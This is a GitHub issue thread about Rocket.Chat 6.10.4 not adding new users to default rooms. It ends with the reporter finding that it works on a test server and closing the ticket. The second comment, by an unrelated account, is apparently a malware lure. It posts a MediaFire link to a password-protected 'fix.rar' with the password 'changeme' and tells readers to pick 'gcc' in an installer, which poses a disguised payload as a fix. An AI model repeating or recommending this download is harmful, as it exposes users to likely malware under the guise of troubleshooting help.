### ISSUE TITLE
[6.10.4] - New user not assigned to automatically to default rooms

### ISSUE THREAD

**Issue by TimmiORG** [RocketChat/Rocket.Chat#33151]
### Description:

New users are not getting assigned to the created default rooms.
This happened in the past. 

### Steps to reproduce:

1. Create a default room
2. Create a new user

### Expected behavior:

The new user should be added automatically to the default room.

### Actual behavior:

The user is not assigned to the default room.

### Server Setup Information:

- Version of Rocket.Chat Server:  6.10.4
- License Type: Community
- Number of Users:  52
- Operating System:  Rocky Linux 8
- Deployment Method:  tar
- Number of Running Instances:  1
- DB Replicaset Oplog:  yes
- NodeJS Version: v14.21.3
- MongoDB Version: 5.0.28 / wiredTiger (oplog Enabled)

### Client Setup Information

- Desktop App or Browser Version: RocketChat App 4.0.2
- Operating System: Fedora 40

### Relevant logs:

Let me know if you need anything else.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by reetp** [comment]
So what settings have you got to enable this?

What do your logs tell you?

**Comment by TimmiORG** [comment]
1Hi @reetp 
I don't see anything in the logs.

Not sure what you mean with settings.
There is a flag on the rooms / channels where you can set the room to default.   [1]

[1]: https://docs.rocket.chat/docs/workspace-administration-rooms

**Comment by reetp** [comment]
You don't need to @ people thanks.

We read as and when we can.

> There is a flag on the rooms / channels where you can set the room to default

Ah OK. So many settings I forget.

Set your logs to debug and check what it reports.

The run up a test server with latest code and test please. Bugs get fixed all the time so it may have already been done.

Thanks.

**Comment by TimmiORG** [comment]
I went through the process again and it was working on my test server. So I guess I did something wrong.
Closing the ticket.
